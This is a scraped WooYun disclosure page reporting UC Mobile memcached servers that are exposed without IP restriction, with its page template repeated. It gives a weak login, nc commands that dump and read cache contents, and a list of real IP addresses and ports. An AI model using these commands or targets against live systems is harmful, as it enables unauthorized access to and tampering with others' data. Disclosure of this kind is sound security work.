UC运维不当可导致大量数据泄漏 | wooyun-2013-018975| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-018975

漏洞标题：UC运维不当可导致大量数据泄漏

漏洞作者：你撸我也撸

提交时间：2013-02-21 00:06

修复时间：2013-04-07 00:07

公开时间：2013-04-07 00:07

漏洞类型：系统/服务运维配置不当

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-02-21：细节已通知厂商并且等待厂商处理中
2013-02-21：厂商已经确认，细节仅向厂商公开
2013-03-03：细节向核心白帽子及相关领域专家公开
2013-03-13：细节向普通白帽子公开
2013-03-23：细节向实习白帽子公开
2013-04-07：细节向公众公开

简要描述：

RT!

详细说明：

先给个弱口令：
test 123456

漏洞证明：

哥差点把小心肝都吓出来了，这整个C段的memcached都是你们家的吧？
先引用一下yunshu的case： WooYun: memcached未作IP限制导致缓存数据可被攻击者控制 
可以直接对缓存进行get、replace、incr/decr等操作：

nc -vv 121.14.161.152 11211

stats items

stats cachedump 167 0

get图片的缓存：

nc -vv 121.14.161.152 11215

121.14.161.151: 11211
121.14.161.152: 11211
121.14.161.152: 11215
121.14.161.153: 11211
121.14.161.155: 11211
121.14.161.154: 11211
121.14.161.156: 11211
121.14.161.157: 11211
121.14.161.159: 11211
121.14.161.158: 11211
121.14.161.160: 11211
121.14.161.161: 11211
121.14.161.163: 11211
121.14.161.162: 11211
121.14.161.180: 11211
121.14.161.187: 11211
121.14.161.197: 11211
121.14.161.205: 11211
121.14.161.214: 11211
121.14.161.153: 11212
121.14.161.153: 11215
121.14.161.154: 11212
121.14.161.154: 11215
121.14.161.155: 11212
121.14.161.155: 11215
121.14.161.159: 11212
121.14.161.159: 11215
121.14.161.160: 11212
121.14.161.160: 11215
121.14.161.161: 11212
121.14.161.171: 11212
121.14.161.171: 11215
121.14.161.172: 11212
121.14.161.172: 11215
121.14.161.173: 11212
121.14.161.179: 11212
121.14.161.179: 11215
121.14.161.205: 11212

修复方案：

 WooYun: memcached未作IP限制导致缓存数据可被攻击者控制  这个标题中已经给出比较合理的修复方案了！

版权声明：转载请注明来源你撸我也撸@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2013-02-21 11:05

厂商回复：

非常感谢你撸我也撸提交安全漏洞，运维人员疏忽导致，我们会尽快处理。

漏洞评价：

2013-02-21 10:07 | Shell ( 路人 | Rank:14 漏洞数:4 | shell)

这种敏感数据应该灰常多
2013-02-21 17:23 | 你撸我也撸 ( 路人 | Rank:30 漏洞数:3 | xxx)

这个主要不是数据泄露的问题，是可以控制数据的！
2013-04-08 16:39 | 陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)

@你撸我也撸 @xsser
2013-06-03 18:01 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大（腾讯微博Passer...)

@xsser drops搞个这个东西怎么控制数据啊怎么shell？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-018975

漏洞标题：UC运维不当可导致大量数据泄漏

相关厂商：UC Mobile

漏洞作者：你撸我也撸

提交时间：2013-02-21 00:06

修复时间：2013-04-07 00:07

公开时间：2013-04-07 00:07

漏洞类型：系统/服务运维配置不当

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源你撸我也撸@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-018975

漏洞标题：UC运维不当 可导致大量数据泄漏

相关厂商：UC Mobile

漏洞作者： 你撸我也撸

提交时间：2013-02-21 00:06

修复时间：2013-04-07 00:07

公开时间：2013-04-07 00:07

漏洞类型：系统/服务运维配置不当

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-018975"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 你撸我也撸@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞标题：UC运维不当可导致大量数据泄漏

漏洞作者：你撸我也撸

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源你撸我也撸@乌云